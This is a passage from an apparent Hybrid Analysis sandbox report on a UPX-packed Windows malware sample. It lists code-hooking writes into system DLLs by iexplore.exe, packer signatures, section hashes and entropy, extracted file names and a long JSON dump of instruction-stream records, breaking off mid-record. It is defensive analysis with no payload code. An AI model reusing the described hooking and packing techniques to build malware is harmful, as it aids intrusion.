"iexplore.exe" wrote bytes "e92e0d10f9" to virtual address "0x7554CF42" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e9b296d2f8" to virtual address "0x757E9D0B" (part of module
"OLE32.DLL")
"iexplore.exe" wrote bytes "e9fc7967fa" to virtual address "0x73FD7922" (part of module
"COMCTL32.DLL")
"iexplore.exe" wrote bytes "e9b090f7f8" to virtual address "0x7550ABE1" (part of module
"USER32.DLL")
source
Hook Detection
relevance
10/10
Matched Compiler/Packer signature
details
"c9b65b764985dfd7a11d3faf599c56b8.exe.bin" was detected as "UPX v1.25 (Delphi) Stub"
"w7e2219.tmp" was detected as "Visual C++ 2005 DLL -> Microsoft"
"~ER24B7.tmp" was detected as "Visual C++ 2005 DLL -> Microsoft"
"~ER1AFA.tmp" was detected as "VC8 -> Microsoft Corporation"
source
Static Parser
relevance
10/10
Reads information about supported languages
details
"sysprep.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key:
"00000409")
source
Registry Access
relevance
3/10
File Details
All Details:
c9b65b764985dfd7a11d3faf599c56b8
File Sections
Details Name Entropy
Virtual
Address
Virtual
Size
Raw
Size
MD5
Name
UPX0 0 0x1000 0x22d000 0x0 d41d8cd98f00b204e9800998ecf8
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 13 of 25

Details Name Entropy
Virtual
Address
Virtual
Size
Raw
Size
MD5
UPX0
Entropy
0
Virtual Address
0x1000
Virtual Size
0x22d000
Raw Size
0x0
MD5
d41d8cd98f00b204e9800998ecf8427e
Name
UPX1
Entropy
7.9309190833
Virtual Address
0x22e000
Virtual Size
0x4c000
Raw Size
0x4ba00
MD5
fafee9506c2cb7606718693156703f67
UPX1 7.9309190833 0x22e000 0x4c000 0x4ba00 fafee9506c2cb760671869315670
Name
.rsrc
Entropy
4.06720567587
Virtual Address
0x27a000
Virtual Size
0x1000
Raw Size
0x600
MD5
80e9f3854461573cdd5ef15498a07fd4
.rsrc 4.06720567587 0x27a000 0x1000 0x600 80e9f3854461573cdd5ef15498a0
File Resources
File Imports
ADVAPI32.dll
KERNEL32.DLL
Screenshots
Hybrid Analysis
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 14 of 25

Tip: Click an analysed process below to view more details.
Analysed 10 processes in total.
 c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) 46/66
Network Analysis
DNS Requests
HTTP Traffic
Suricata Alerts
ET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.
Extracted Files
Displaying 12 extracted file(s). The remaining 4 file(s) are available in the full version and XML/JSON reports.
ud.bat
desktop.ini
Filepath
%USERPROFILE%\Desktop\desktop.ini
Size
Unknown (0 bytes)
Type
empty
Runtime Process
iexplore.exe (PID: 2672)
Warnings
Added comment to Virus Total report
Enforcing malicious verdict, as a reliable source indicates high confidence
Not all sources for indicator ID "api-51" are available in the report
Not all sources for indicator ID "api-55" are available in the report
Not all sources for indicator ID "hooks-8" are available in the report
Not all sources for indicator ID "mutant-0" are available in the report
{"publicService":true,"flashFadeaway":true,"fadeawayTimeout":15,"autoLogout":false,"autoLogoutTimeout":0,"reCaptcha":"6LeJvv0SAAAAAG8IuH0l
uT","enableCookieBanner":true,"enableAdobeAnalytics":true}
Hybrid Analysis requires that users undergo the Hybrid Analysis Vetting Process prior to obtaining an API key or
downloading malware samples. Please note that you must abide by the Hybrid Analysis Terms and Conditions and only use
these samples for research purposes. You are not permitted to share your user credentials or API key with anyone else.
Please notify Hybrid Analysis immediately if you believe that your API key or user credentials have been compromised.
{"id":"5b1f12537ca3e160de29d536","sample_targets_streams_data":{"00013784-00002080-57436-107-009838E0":
{"uid":"00013784-00002080-57436-107-009838E0","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":363},"00013784-00002080-57436-145-
00984D50":{"uid":"00013784-00002080-57436-145-
00984D50","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":140},"00013784-00002080-57436-160-00984830":{"uid":"00013784-00002080-
57436-160-00984830","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":113},"00013784-00002080-57436-186-
00987960":{"uid":"00013784-00002080-57436-186-
00987960","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":112},"00013784-00002080-57436-108-009850A0":{"uid":"00013784-00002080-
57436-108-009850A0","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":109},"00013784-00002080-57436-133-
00984A10":{"uid":"00013784-00002080-57436-133-
00984A10","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":132},"00013784-00002080-57436-16-00986896":{"uid":"00013784-00002080-
57436-16-00986896","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 15 of 25

00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":67},"00013784-00002080-57436-17-
009874D0":{"uid":"00013784-00002080-57436-17-
009874D0","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":58},"00013784-00002080-57436-198-0098A53C":{"uid":"00013784-00002080-
57436-198-0098A53C","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":53},"00013784-00002080-57436-183-
0098A07C":{"uid":"00013784-00002080-57436-183-
0098A07C","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":190},"00013784-00002080-57436-171-00981050":{"uid":"00013784-00002080-
57436-171-00981050","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":21},"00013784-00002080-57436-14-
00987550":{"uid":"00013784-00002080-57436-14-
00987550","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":42},"00013784-00002080-57436-9-009875CB":{"uid":"00013784-00002080-
57436-9-009875CB","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":42},"00013784-00002080-57436-59-
009810A0":{"uid":"00013784-00002080-57436-59-
009810A0","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":216},"00013784-00002080-57436-1-009874C6":{"uid":"00013784-00002080-
57436-1-009874C6","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":86},"00013784-00002080-57436-11-
009899FD":{"uid":"00013784-00002080-57436-11-
009899FD","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":161},"00013784-00002080-57436-13-0098C88C":{"uid":"00013784-00002080-
57436-13-0098C88C","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":128},"00013784-00002080-57436-314-
0098D0F0":{"uid":"00013784-00002080-57436-314-
0098D0F0","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":340},"00013784-00002080-57436-208-0098B407":{"uid":"00013784-00002080-
57436-208-0098B407","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":61},"00013784-00002080-57436-280-
00981000":{"uid":"00013784-00002080-57436-280-
00981000","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":26},"00013784-00002080-57436-455-009896B7":{"uid":"00013784-00002080-
57436-455-009896B7","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":4},"00013784-00002080-57436-91-
0098D5F8":{"uid":"00013784-00002080-57436-91-
0098D5F8","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":181},"00013784-00002080-57436-324-0098CEA6":{"uid":"00013784-
00002080-57436-324-0098CEA6","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":166},"00013784-00002080-57436-32-
009876B7":{"uid":"00013784-00002080-57436-32-
009876B7","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":57},"00013784-00002080-57436-36-0098B35B":{"uid":"00013784-00002080-
57436-36-0098B35B","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":30},"00013784-00002080-57436-197-
0098A31C":{"uid":"00013784-00002080-57436-197-
0098A31C","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":20},"00013784-00002080-57436-60-00984C80":{"uid":"00013784-00002080-
57436-60-00984C80","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":51},"00013784-00002080-57436-37-
0098D4DA":{"uid":"00013784-00002080-57436-37-
0098D4DA","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":93},"00013784-00002080-57436-42-0098B99D":{"uid":"00013784-00002080-
57436-42-0098B99D","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":53},"00013784-00002080-57436-6-
00989749":{"uid":"00013784-00002080-57436-6-
00989749","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":13},"00013784-00002080-57436-301-0098956D":{"uid":"00013784-00002080-
57436-301-0098956D","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":44},"00013784-00002080-57436-150-
00981A60":{"uid":"00013784-00002080-57436-150-
00981A60","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":455},"00013784-00002080-57436-335-0098AF7B":{"uid":"00013784-
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 16 of 25

00002080-57436-335-0098AF7B","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-
00002080","root_target_uid":"00013602-00002084","stream_type":0,"instructions":162},"00013784-00002080-57436-285-
00985270":{"uid":"00013784-00002080-57436-285-
00985270","pid":2080,"name":"~ER1AFA.tmp","child_target_uid":"00013784-00002080","root_target_uid":"00013602-
00002084","stream_type":0,"instructions":33},"62573-161-0040DF5E":{"uid":"62573-161-
0040DF5E","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":2201},"62573-107-004038E0":{"uid":"62573-107-
004038E0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":363},"62573-2460-0046FC20":{"uid":"62573-2460-
0046FC20","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":1041},"62573-778-004F2E20":{"uid":"62573-778-
004F2E20","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":1041},"62573-5318-004CFFF3":{"uid":"62573-5318-
004CFFF3","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":450},"62573-721-004EE920":{"uid":"62573-721-
004EE920","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":301},"62573-2403-0046B720":{"uid":"62573-2403-
0046B720","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":301},"62573-11-004099FD":{"uid":"62573-11-
004099FD","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":161},"62573-190-00407960":{"uid":"62573-190-
00407960","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":112},"62573-3936-0040B407":{"uid":"62573-3936-
0040B407","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":61},"62573-4061-0040D0F0":{"uid":"62573-4061-
0040D0F0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":340},"62573-13-0040C88C":{"uid":"62573-13-
0040C88C","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":128},"62573-4002-00403F60":{"uid":"62573-4002-
00403F60","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":344},"62573-4766-0049E874":{"uid":"62573-4766-
0049E874","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":1135},"62573-5269-004D0C20":{"uid":"62573-5269-
004D0C20","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":1135},"62573-1273-004B68B0":{"uid":"62573-1273-
004B68B0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":217},"62573-2955-004336B0":{"uid":"62573-2955-
004336B0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":217},"62573-4364-0044DA20":{"uid":"62573-4364-
0044DA20","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":1135},"62573-59-004010A0":{"uid":"62573-59-
004010A0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":216},"62573-4413-0044CDF3":{"uid":"62573-4413-
0044CDF3","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":450},"62573-4815-0049DC47":{"uid":"62573-4815-
0049DC47","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":450},"62573-4482-004445AC":{"uid":"62573-4482-
004445AC","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":829},"62573-5387-004C77AC":{"uid":"62573-5387-
004C77AC","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":829},"62573-4885-00490E91":{"uid":"62573-4885-
00490E91","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":829},"62573-133-00404A10":{"uid":"62573-133-
00404A10","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":132},"62573-3938-0040C64F":{"uid":"62573-3938-
0040C64F","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":141},"62573-859-004E3560":{"uid":"62573-859-
004E3560","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":361},"62573-2541-00460360":{"uid":"62573-2541-
00460360","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":361},"62573-747-004F9284":{"uid":"62573-747-
004F9284","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":755},"62573-6172-004414C8":{"uid":"62573-6172-
004414C8","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 17 of 25

00002084","stream_type":2,"instructions":725},"62573-3739-00418B0C":{"uid":"62573-3739-
00418B0C","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":704},"62573-755-004F60BC":{"uid":"62573-755-
004F60BC","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":704},"62573-7139-00496AEB":{"uid":"62573-7139-
00496AEB","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":725},"62573-2429-00476084":{"uid":"62573-2429-
00476084","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":755},"62573-3731-0041C7D0":{"uid":"62573-3731-
0041C7D0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":755},"62573-2437-00472EBC":{"uid":"62573-2437-
00472EBC","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":704},"62573-7694-004C46C8":{"uid":"62573-7694-
004C46C8","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":725},"62573-3933-0040835C":{"uid":"62573-3933-
0040835C","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":258},"62573-5311-004D2B47":{"uid":"62573-5311-
004D2B47","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":274},"62573-2005-004800B0":{"uid":"62573-2005-
004800B0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":635},"62573-4071-0040CEA6":{"uid":"62573-4071-
0040CEA6","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":166},"62573-1268-004B76C0":{"uid":"62573-1268-
004B76C0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":659},"62573-1392-004AD670":{"uid":"62573-1392-
004AD670","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":608},"62573-2443-00474070":{"uid":"62573-2443-
00474070","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":677},"62573-3159-00428B60":{"uid":"62573-3159-
00428B60","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":665},"62573-323-005032B0":{"uid":"62573-323-
005032B0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":635},"62573-1477-004ABD60":{"uid":"62573-1477-
004ABD60","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":665},"62573-3074-0042A470":{"uid":"62573-3074-
0042A470","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":608},"62573-761-004F7270":{"uid":"62573-761-
004F7270","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":677},"62573-3745-0041E728":{"uid":"62573-3745-
0041E728","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":677},"62573-2950-004344C0":{"uid":"62573-2950-
004344C0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":659},"62573-1854-004A148A":{"uid":"62573-1854-
004A148A","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":500},"62573-3053-00442E51":{"uid":"62573-3053-
00442E51","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":589},"62573-2368-0046AD10":{"uid":"62573-2368-
0046AD10","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":554},"62573-8999-004096B7":{"uid":"62573-8999-
004096B7","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":4},"62573-1371-004C6051":{"uid":"62573-1371-
004C6051","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":589},"62573-1850-00498C6C":{"uid":"62573-1850-
00498C6C","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":589},"62573-3033-0043EC74":{"uid":"62573-3033-
0043EC74","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":500},"62573-4053-0040A889":{"uid":"62573-4053-
0040A889","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":111},"62573-4048-0040956D":{"uid":"62573-4048-
0040956D","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":44},"62573-1351-004C1E74":{"uid":"62573-1351-
004C1E74","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":500},"62573-686-004EDF10":{"uid":"62573-686-
004EDF10","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 18 of 25

00002084","stream_type":2,"instructions":554},"62573-1331-004B3580":{"uid":"62573-1331-
004B3580","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":458},"62573-2822-0043D41B":{"uid":"62573-2822-
0043D41B","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":494},"62573-2564-0045E940":{"uid":"62573-2564-
0045E940","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":465},"62573-4716-0049485D":{"uid":"62573-4716-
0049485D","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":489},"62573-6543-00460D00":{"uid":"62573-6543-
00460D00","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":483},"62573-5230-004CAE70":{"uid":"62573-5230-
004CAE70","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":489},"62573-815-004E07B0":{"uid":"62573-815-
004E07B0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":196},"62573-6699-0046C5A0":{"uid":"62573-6699-
0046C5A0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":468},"62573-3013-00430380":{"uid":"62573-3013-
00430380","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":458},"62573-2497-0045D5B0":{"uid":"62573-2497-
0045D5B0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":196},"62573-4772-0049FE32":{"uid":"62573-4772-
0049FE32","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":499},"62573-802-004E9040":{"uid":"62573-802-
004E9040","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":428},"62573-4032-00405270":{"uid":"62573-4032-
00405270","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":33},"62573-1749-0048EBDA":{"uid":"62573-1749-
0048EBDA","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":494},"62573-3240-004244D9":{"uid":"62573-3240-
004244D9","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":452},"62573-4082-0040AF7B":{"uid":"62573-4082-
0040AF7B","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":162},"62573-4098-00428190":{"uid":"62573-4098-
00428190","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":192},"62573-831-004E7640":{"uid":"62573-831-
004E7640","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":497},"62573-5003-004AB390":{"uid":"62573-5003-
004AB390","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":192},"62573-150-00401A60":{"uid":"62573-150-
00401A60","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":455},"62573-8221-004EF7A0":{"uid":"62573-8221-
004EF7A0","file_uid":"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5","child_target_uid":"00013602-
00002084","stream_type":2,"instructions":468},"62573-5275-004D21DE":{"uid":"62573-5275-
